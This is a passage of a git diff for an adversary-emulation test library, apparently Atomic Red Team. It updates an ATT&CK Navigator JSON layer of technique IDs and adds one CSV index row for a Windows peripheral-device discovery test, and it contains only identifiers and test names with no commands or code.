:"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 1640b82b..0dbf2397 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 466ec3ec..99e74211 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -628,6 +628,7 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash +discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index df92f2e3..cc4d262a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -447,6 +447,7 @@ discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt +discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3a5c0299..1d2baaf6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 